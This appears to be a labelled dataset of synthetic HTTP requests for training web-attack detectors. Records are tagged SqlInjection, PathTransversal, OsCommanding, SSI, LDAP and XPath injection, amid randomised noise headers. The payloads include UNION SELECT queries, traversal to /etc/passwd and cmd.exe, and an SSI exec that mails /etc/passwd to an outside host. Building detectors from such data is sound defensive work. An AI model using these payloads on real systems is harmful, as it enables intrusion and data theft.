UA-Color: color32
UA-Pixels: 512x475
Via: 5.0 55.98.52.230, taob/3.4 www.o0o4e.js, 3.0 www.i1bmt.tiff
Transfer-Encoding: gzip
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42937
Start - Id: 42171
class: SqlInjection
GET /eu5r7entut/hdUSL/a3el/tlF_9/du7sWNsoiiau/ouTuj/vxxrinput@kVFp99Jbetween/rafi2rc1tihItyy7n/replaceBZ50NiKR9A5/4nnotulrrRuWeHED4/s2tsymw.css?a66c8isdE6=hitpa0&9Iue=fot&IridEsUrAt=1710367080&hot4rn0=7&d4FOkZiMn=27797901&tCtiqtblga=sotdocument&4cd=iYgnvsa&oosan4tennoiuat=aia%2F&W4_Du0=s1%3EaD%29aE35t+hfrom-ted&aIo3tshi=iya%27%2F**%2FUNION%2F**%2FSELECT%2F**%2F9me%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fml7dsi%2F**%2Flike%2F**%2F%27%2525&tahusriemnna5dy=tjlD41wXvCS0&SXdkTftG.=1225&So=226348&Yboot.ini.J01bIIadminK=ny%3Bwh HTTP/1.1
Host: www.oictswul0.uk
Connection: syEeree
Accept: text/*;q=0.8, image/*
Accept-Charset: windows-1250;q=0.9
Accept-Encoding: gzip;q=0.5, deflate;q=0.3, compress, compress
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 83.24.252.26
Cookie: tg0za=5229;feheel1cb=tf1nGRFQ;hoaGo= ql |oad'niblhi7bgsoundt
Cookie2: $Version="5"
Date: Fri, 06 May 05 06:12:51 CET
ETag: "rmoKgaJRhzxXhz04d"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 21 Apr 08 09:51:44 GMT
If-Unmodified-Since: Mon, 23 Jun 08 07:34:32 UTC
If-Match: "yZjPYsdxkZX2ETBc"
If-None-Match: "7Bw28xDqe9UAVH1I1e7"
If-Range: Wed, 23 Mar 05 22:21:25 GMT
Max-Forwards: 9249
MIME-Version: 5.9
Pragma: 7dris=ohfYtam
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: EfkCa saIty=r0olytq
Range: -65233,-6365
Referer: /lgbrmear/dtnn.jsp
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.9 (Windows; U; Win98 1.5; lL-bH; rv:3.7.2) Gecko/90329509
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/9.3 114.145.212.175, 7.9 153.253.174.161:86
Transfer-Encoding: gzip
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42171
Start - Id: 41189
class: SqlInjection
GET /ux.jpg?icnng=etcn+wqcconnectt&sG49eAtha=79133162&oFWXV5=jed%28ideomochaihper&eerlifljwmni=+psh%5Crbe8tbaB%24ecmd%29asl&.VEexecby7DA=m+ln&daAt5dhV76=Ay5%24md+union&mi94dhtemreeas=4645&siseCurhar1cslE=naTt&dgtnhhyrye6eseu=rw.f%40hh&lcejeet3oel=%5Cscript%7Eet%3En%3D&GQsJ5Zperlxte=372951&uihch9rdRfain=no&cu=3068 HTTP/1.1
Host: www.sseeaaey.com:569
Connection: eeiooe
Accept: text/*;q=0.0, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: chairs'    UN/**/ION     SEL/**/ECT ta     FROM dba_users WHERE   arhfstr  like     '%25
Cache-Control: only-if-cached
Client-ip: 151.63.160.140
Cookie: oa2=taedYyG;et8axee=rm3&hifrtchildmnidet7;um8eeseKhnoacs0=482301464;B@jMZai=387197
Cookie2: $Version="3"
Date: Mon, 09 Apr 07 07:12:19 CET
ETag: "ThY1cTTEqxmOVuYl"
Expect: 100-continue
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Mon, 11 Feb 08 05:18:18 GMT
If-Unmodified-Since: Sun, 27 Jul 08 17:12:55 CET
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: Thu, 14 Feb 08 02:41:37 UTC
Max-Forwards: 47
MIME-Version: 2.7
Pragma: dbtinie='vtiiab'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic MWl0aWE6MGw0dGNhdA==
Range: 9065-,05267-,-40262
Referer: http://www.lhwalRd.uk/odBedt/ersmn/thgtonm4/dBkm.jpeg
TE: chunked,gzip,trailers
Trailer: Date
User-Agent: t9SqqHc http://www.zheny.net
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: HTTP/2.2 49.121.234.30
Transfer-Encoding: deflate
Upgrade: tsecta/8.0, aaav/5.4, eE0/6.3
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 247.67.228.93
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41189
Start - Id: 38562
class: LdapInjection
GET /I66Q/oAA-UbcN7Mcy/ssSZ5I.htm?koncxandpsZ=%29+++%28++%7C++++%28displayName%3Dhad*%29%28name+%3D+++had*++%29%28++++mail%3Dhad*+%29 HTTP/1.1
Host: www.iqcCai.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 40.99.33.206
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="8"
Date: Wed, 15 Dec 04 18:50:23 CET
ETag: "NleyT9id4hORF0K"
Expect: 100-continue
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Mon, 17 Jan 05 03:53:45 CET
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "gCBN6nfSl73hMnHWZ"
If-None-Match: "TLY7LRv2Atgq5Ufdw"
If-Range: "A-jDpJflhN@CSYCe92s"
Max-Forwards: 1015
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest realm
Range: -956,35-
Referer: /tnct.jsp
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: t2tm (8_-hGiexy; a7WljD; opytZJCF)
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 745x811
Via: 7.6 www.tir1e7v.css, 4.5 82.191.127.122
Transfer-Encoding: deflate
Upgrade: noo/0.4
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38562
Start - Id: 43372
class: OsCommanding
GET /linkHj2scriptx0NeUNupdateL/_xrHs.cgi?SHeM7gmdmL=8441949&e5ty5sssoK=mail+++++virrriaa%40mdd0si.am2swt.gov+++++%3C%3C+++++%2Ftmp%2Fwu.c+++%3B HTTP/1.1
Host: www.f9ui.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 255.185.181.53
Cookie: ejt=tIdz7k;tSnetsiHi1o=Rsu5iea;drop-HmNA= nr
Cookie2: $Version="002"
Date: Fri, 19 Jan 07 04:29:59 CET
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: orlrdan@v6sk.it
If-Modified-Since: Thu, 29 Apr 04 21:49:04 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Oct 05 03:12:30 CET
Max-Forwards: 90
MIME-Version: 2.7
Pragma: 6i7xh='n9he'
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: /w8taam/DLbH7.php
TE: trailers
Trailer: Authorization
User-Agent: adweTneR7d9snjanesa
UA-CPU: Sparc
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: Esl/8.6 66.199.162.24:635, 9.0 www.p474vb.tiff:8749, HTTP/2.1 65.47.98.138
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43372
Start - Id: 46081
class: PathTransversal
POST /Bem/imhswselnase3a.dll? HTTP/1.1
Content-Length: 290
Content-Language: R,abh,wnare
Content-Encoding: compress
Content-Location: /8tjued/9rur/1Y1oh/0rhescla.sh
Content-MD5: UHJzZ3o4ZXlxWXlDZXRzMA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Mar 04 15:44:43 CET
Last-Modified: Sat, 10 Jul 04 17:10:53 GMT
Host: 13.226.100.220:848
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesesimp;q=0.6, x-mac-arabic
Accept-Encoding: identity, gzip;q=0.3
Accept-Language: ene-t;q=0.6, dhX-i3;q=0.3, n-bhnr, ae-fg;q=0.7
Cache-Control: no-cache
Client-ip: 135.238.113.4
Cookie: 83hsgteaiT=joconnect9 otareplacechsd;Idgsyehtc=fvIUOTiAwr;ep5n=tsroEkTwgetiselectkwIecpi
Cookie2: $Version="7"
Date: Sun, 27 Sep 09 06:29:01 GMT
Expect: 100-continue
If-Modified-Since: Thu, 11 Mar 10 01:31:14 CET
If-Unmodified-Since: Mon, 24 Dec 07 22:05:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest username="teawnat"
Referer: /tshNlgam/toprnnwn/rd2Lie/entxs/oiat.gif
TE: gzip
User-Agent: oiofleds (19brvQr; onxPFnU3; rNhY62x)
Via: FTP/2.2 149.96.97.72, 3.0 www.wyred.jpg, 9tg/4.6 www.neharoo.html
Transfer-Encoding: deflate
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_tQujNzpH=8&.connectfL=vr7obnaq0&qzl0ldebs=?1hoetfperllsam%uro&TdnpehU=89342909&4VQ3_=ed-n8&HYEwlI3=yeha6/roXftpmi$h&7tolIaN=ecenl4scmd~sam6mR&VCYHPGdbgroup by34L=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&enNfo=54&4m4obgRsdcteeyH=mnnarsmnab

End - Id: 46081
Start - Id: 40051
class: SSI
GET /cA@LRHCQ6AR5Y7S05nDU.php3?dXgqUu-MNrm9=h-PwfPnS0a&iO=nr%3Ai&9ejihfpaSe8F=83319&qri6ojsdrse=rt%7Ci5doxdeleteuiliked&utkaiegrtv=ol&bruwt3me=nAkLbQVQF035&mtnSgBqsenRpi=vbscript&deu4bsnreospf=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail++++lofxeca.com+++%3C++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.utOkfedht.de:3
Connection: close
Accept: text/html, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3Y-7ovtn
Cache-Control: nailc8w='n8u'
Client-ip: 9.121.250.171
Cookie: aToelwx6eDnio9h=9IK-QeijdRJ_;EllnAeo2b=jMV8q9ygpC;ogn5asEl=uneT2mnodestdin7ttL>;uz-9lLmailicsecho=lttls;QDy.f=wbvhu
Cookie2: $Version="977"
Date: Tue, 12 Aug 08 01:45:36 UTC
ETag: W/"@kXdQdUuf6Ez12v"
Expect: 100-continue
From: crdluua@zohe.com
If-Modified-Since: Wed, 03 Jan 07 18:47:09 UTC
If-Unmodified-Since: Sun, 03 Jun 07 21:41:11 GMT
If-Match: "BZGI_H@5lmn62uykm1E7"
If-None-Match: "X8V@lzT2U6VFNOzvHy"
If-Range: "B75XTxrjovTF9CVsENQ"
Max-Forwards: 5359
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: Basic YWlpYU50VDpqbTNlZTdwcQ==
Range: 271-,17364-
Referer: http://www.5tntoi.biz/doef/dnessiM/mtabdbad/eRc5rnou/ldwtegee.jsp
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: eQU92Rk.sH http://www.sc1ahieh.st
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4665x776
Via: 0.9 193.126.112.77
Transfer-Encoding: deflate
Upgrade: cGu/7.6
Warning: 121 www.dA5sr8o.jpeg "styttnrgtUmmsooculs" "Sun, 07 Dec 08 03:09:39 CET"
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40051
Start - Id: 42874
class: OsCommanding
GET /lTea7eyUcaoo.nsf?ixfromIzO87a=Argsdekd1NU7dl&lsud=l7bJn&bwjracigkqezxyi=665710&8ph=mt%40ba1jXe&saev=677282832&lfdPromeEba=imQg.s&kensm=Tnqnllnnhtpassoubrtaa%3Bnsxml&sibaar=ej7&Otvgzb=eSCl&ziogeedu=%7C++dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C HTTP/1.1
Host: 187.223.106.145:4416
Connection: close
Accept: */*;q=0.2
Accept-Encoding: deflate;q=0.9, gzip;q=0.1
Accept-Language: *
Cache-Control: no-store
Cookie2: $Version="664"
Date: Tue, 16 Jun 09 05:39:39 UTC
Expect: 100-continue
If-Unmodified-Since: Wed, 21 Jan 04 03:25:37 GMT
If-Match: "WrK7_oiqfGVT@ZPe3UAC"
If-None-Match: "xWQK.kVf1cJCo0mdg"
If-Range: *
Max-Forwards: 98
Pragma: zphtork=q
Proxy-Authorization: NTLM dXR3aHRseWlvb3Q0MXdzZDVsMnNvZG9mcnNzaG9nc2s=
Authorization: h47tfy eotB=zayei
Referer: /5Ee8.css
User-Agent: m0vtlmlY
Via: tseh/1.7 184.105.55.99
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"

null

End - Id: 42874
Start - Id: 36523
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 192.119.131.172
Connection: keep-alive
Accept: */*
Accept-Charset: koi8, utf-7, iso-8859-2
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=34079
Client-ip: 65.215.179.86
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="016"
Date: Wed, 15 Jun 05 05:03:30 CET
ETag: W/"MpfI0bsb1HguCI@Llqy"
Expect: aarhruw=emesi
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Fri, 15 Oct 04 08:23:47 CET
If-Unmodified-Since: Wed, 30 Aug 06 17:29:18 UTC
If-Match: "3OF@B6v2RpG-mDdi@_BQ"
If-None-Match: "Z-DYOiZ.iK-wTpj1"
If-Range: *
Max-Forwards: 34
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Epaq
Authorization: NTLM d3Jtb3RpbmVzY240ZWkwb09sYWhvYVRlcm5wZHRseWhlOGk=
Range: 17-
Referer: http://www.dtY31sm.gov/Et3d8tq.bin
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: fOoowho (iFIQp2r; oia0jbk)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9877x8489
Via: 3.0 www.asSaxetn.gif, 3.5 221.229.147.43
Transfer-Encoding: deflate
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36523
Start - Id: 38737
class: LdapInjection
GET /aLi91v.wvJcY/oAUcVGzH4PKddjDMXup3/o3/ttrh/tzcy2esme6ituR/jirTdwrIuronrs/8betweenZHb5IMQGxj_r.php3?yaqbewV4ct=phweTmrh3dl1&etoeFueo=dg&gj5YtX6w=3990&2szeirpXrei=z4hgRGVPeX&zTqgromrx7o8=aryider8aeeh&aotlbu=t%40p9fYM7a&e8lj=cikX8VnspGHn&tIei=Tjiiagnhfdeelanre&eWspvhasiyieas=9097436564&dBE@e=08624&q5tbcrtih=ehnr%29%28%26%28objectClass%3D++++enm*%29 HTTP/1.0
Host: www.uzdue.it
Connection: uiuagc
Accept: audio/basic;q=0.6, audio/basic
Accept-Charset: iso-8859-2, koi8;q=0.6, windows-1257;q=0.4, x-mac-roman, shift_jis
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: hnohir1='tr'
Client-ip: 132.36.253.148
Cookie: iOs5G9=62936763;In1ps=2
Cookie2: $Version="97"
Date: Mon, 11 May 09 17:40:44 CET
ETag: W/"wYpnHj9DHaQ5NK@n"
Expect: Eirzruo
From: BtenoI@9Rnek.gov
If-Modified-Since: Wed, 17 Oct 07 04:58:58 GMT
If-Unmodified-Since: Sat, 15 Aug 09 09:56:25 GMT
If-Match: *
If-None-Match: "KJ@.FoCGdiCsCQfMtxT"
If-Range: Sun, 14 Sep 08 02:47:53 GMT
Max-Forwards: 22
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest username="jobam3xe"
Authorization: Digest opaque="eJotl"
Range: -753,93960-,-52
Referer: http://tawf.it/9vahl/gAo0n/sdnls0/rs4w.swf
TE: trailers
Trailer: Authorization
User-Agent: fiatemq
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 0.9 www.remams.png, 1.9 www.iiipubNl.shtml
Transfer-Encoding: deflate
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38737
Start - Id: 44983
class: PathTransversal
GET /ioTmFMCTw3j05_3FP/iclJBo.html?bTssyao=1441517480&tfeohNrqctror=m7servicesrhumyacsncw&passwd_4JRPr69tZ=iSijOU&Ee0hm6Artgetlhd=tfEea&ofll=pbgsoundia&A5t=niEhtiu&eoblTn=.%2F..%2F..%2F..%2F..%2F..%2F&yGQEM.u4218=hojEj2RG9&Hsg3ceeaopiE=809336&c9tehaLdAecl3lp=%3BahUduef HTTP/1.1
Host: www.ltwnHnglai.net
Connection: close
Accept: image/jpeg, video/*, video/*
Accept-Charset: iso-8859-8-i, cp-950, utf-8;q=0.0, x-mac-greek
Accept-Encoding: *;q=0.5
Accept-Language: shgmaknu-7t;q=0.8, lx-rpouv8n, b-iNa
Cache-Control: min-fresh=315
Client-ip: 64.160.89.221
Cookie: diah=o+N9e9+Es ;qqs
Cookie2: $Version="1"
Date: Mon, 01 Nov 04 07:53:19 CET
ETag: W/"fWTDtBv0S_B@ST7"
Expect: 100-continue
From: ytsw@heeaiueil.de
If-Modified-Since: Wed, 11 Aug 04 02:16:38 CET
If-Unmodified-Since: Fri, 15 Jun 07 23:09:06 CET
If-Match: "U.6Cp08EVmeBk2O0"
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: Sun, 09 Dec 07 17:06:15 GMT
Max-Forwards: 5653
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM NGJFaW1lVGVlbG80ZG1lTnNlNmZiaGhzOGhlY2N5aXNndFRsc1RzNnFpbw==
Authorization: NTLM cmxvaWpGaW94Yzc5b2lpZHMxbWFrYWdjckNlY29lYUVsbm1k
Range: 73-,999598-14093
Referer: /Cpa2no/kmyend/reseetie/ngoD29ei.mpg
TE: trailers,chunked;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/7.2 (compatible; MSIE 6.8; WinNT; nbArh; d1bstae6i)
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.4 www.o6psisrg.png, HTTP/6.0 42.34.251.164, 6.5 www.luTfyi.css
Transfer-Encoding: gzip
Upgrade: aEeIr6/5.8, vitna/3.7
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 8606404239
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44983
Start - Id: 49038
class: XPathInjection
GET /easen9wltuH5dahplgwo.exe?susrrggvah9d=eds&yyeo=a3mancN&is92tstg=ezprD%27++++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++++i+%2B++j+++%2B++k+%2B+l%2B+1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27Squrqzxa%27+%3D+++%27+xlse%27+++++or HTTP/1.0
Host: 119.129.100.239
Connection: uIefsow
Accept: */*;q=0.8
Accept-Charset: windows-1255, iso-8859-5, windows-1252
Accept-Encoding: *
Accept-Language: m-oueteh, gnat-aeh;q=0.2, 436sraeB-r3r;q=0.3, sebau-eh;q=0.9, qble-u;q=0.5
Cache-Control: max-stale=7
Client-ip: 170.235.72.172
Cookie: tsnxjseeitj=1eEufg<d;ardawhtOvv=2184;B01RMnB8lo=n@_;a6VE=iecabeteN2
Cookie2: $Version="246"
Date: Sat, 16 Apr 05 16:19:24 UTC
ETag: "k-nbkP0EM4jJ4NdD2Z"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 22 Oct 06 24:01:38 GMT
If-Unmodified-Since: Sat, 01 Aug 09 24:58:17 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 13:31:18 CET
Max-Forwards: 895
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /newca/jieeoN.css
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: Mozilla/9.7 (compatible; Konqueror/9.3; Open BSD i386; thueryro; ertiaD)
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: identity
Upgrade: sfltc/9.5, Llja/5.6
Warning: 677 1.148.139.109 "EdedporS" "Tue, 26 Jan 10 23:09:25 CET"
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49038
Start - Id: 41652
class: SqlInjection
GET /_c46Tl/do7aneoTtGwFrsequqae.jpg?opm0rer1ehneAy=LndrosheyrdsyA&nyenerjdr7l=9ial5Oo&tt=rn5o%40suSes8swnxets&wi0ctAlLerr=tipositioneeweaanwgethvr&bontou52si=lnaeea&eeevlaU=1447595&9x3K=77&drlrtmhu=c&citwean317dN=%27++++union++++select+++++sum%28lnth0hyi%29++from++mhyiRFdg--&hkPagvci=Phlei1ydfmtor5o&uf1ixB-=kMUoj4&ehmbt78isdnydli=l%3Fsrie6ftp HTTP/1.1
Host: www.ldaomN.com:80
Connection: cAaeo
Accept: */*
Accept-Charset: iso-8859-5, iso-8859-9;q=0.7
Accept-Encoding: deflate;q=0.9, deflate;q=0.7, deflate, compress;q=0.8, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 98.22.159.32
Cookie: gottic4yydiwp=97;cgn=000638;oPeibantDeos=4t|;x41del=4633
Cookie2: $Version="0"
Date: Sat, 11 Jul 09 05:24:35 GMT
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tt48=sne4our
From: iiyM8Tts@ayt2vnn9g.it
If-Modified-Since: Fri, 07 Jan 05 04:28:03 UTC
If-Unmodified-Since: Thu, 16 Sep 04 23:48:45 UTC
If-Match: "x2m-Iw.1E6Z5trfMw"
If-None-Match: *
If-Range: *
Max-Forwards: 594
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: eaoes1 nieeosb=otusaf
Range: -11289
Referer: http://www.aaeente.cz/0nwnmn/eeaaYaei/36nroi4/atcaa/fhwc.tar
TE: gzip;q=0.8,trailers,chunked
Trailer: Trailer
User-Agent: aynRQil_s http://www.Hpocts.st
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/3.0 34.238.112.46, 7.7 62.112.67.163, FTP/7.5 www.LNtocyi.tiff
Transfer-Encoding: compress
Upgrade: tzc/6.0, rs1/4.3, rie/8.9, al5/8.8
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41652
Start - Id: 45128
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 191.48.116.153
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 223.196.253.50
Cookie: h4fsHAttn=joystn;FhhhiIum=rh;MtfeAi6t=2;nhtHbrsubz9lbia=md%ucN r1'C e
Cookie2: $Version="6"
Date: Sun, 22 Oct 06 01:31:07 CET
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: 100-continue
From: ctto@auuzoeRef.fr
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Thu, 08 Apr 10 20:05:06 UTC
If-Match: "wZucsqr@HlFv@TYgFzo"
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 10
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic dHQwSWFicjo3c2FpYXM=
Range: -3,456-488022
Referer: /ytzwlmh/gx9rlhok/Avaw.php
TE: chunked;q=0.2,deflate
Trailer: Host
User-Agent: Mozilla/5.2 (Windows; U; Windows NT 4.9; en-jm; rv:2.2.4) Gecko/82435635
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: 5.5 120.26.172.133
Transfer-Encoding: gzip
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45128
Start - Id: 39708
class: SSI
GET /noXlyEEC1qUh-ubNk/mme@48T1b14N6.js?kA7srfeseo8lt=s&eucofjDl=vEpZ0LBWGy7&VWRXQ@YWu5-=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E HTTP/1.0
Host: www.Oolodt.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: cp-932, windows-874;q=0.7, us-ascii;q=0.5, x-mac-chinesetrad
Accept-Encoding: compress, gzip;q=0.1, gzip
Accept-Language: ieU-smnab;q=0.7, aob5N-M, 2na-0grkssdi
Cache-Control: max-stale
Client-ip: 69.213.71.134
Cookie: aTemenhlf5s=559;tue00tfc7a=oammLD-B7hN_;b0hiw=sLj;ini=ici4oSnaei
Cookie2: $Version="1"
Date: Wed, 14 Oct 09 20:50:06 CET
ETag: "eQt1lpFUkKACMULNX9"
Expect: bufr=y5wn1
From: en976nr@rtqaia.net
If-Modified-Since: Fri, 22 Aug 08 22:32:42 CET
If-Unmodified-Since: Mon, 08 Oct 07 13:38:52 CET
If-Match: "IvKCUr8qbgb3QHm_"
If-None-Match: *
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 71
MIME-Version: 1.4
Pragma: lavyj='j8'
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: /ej5fGe/0eatNin9/uklvue.htm
TE: gzip,deflate
Trailer: From
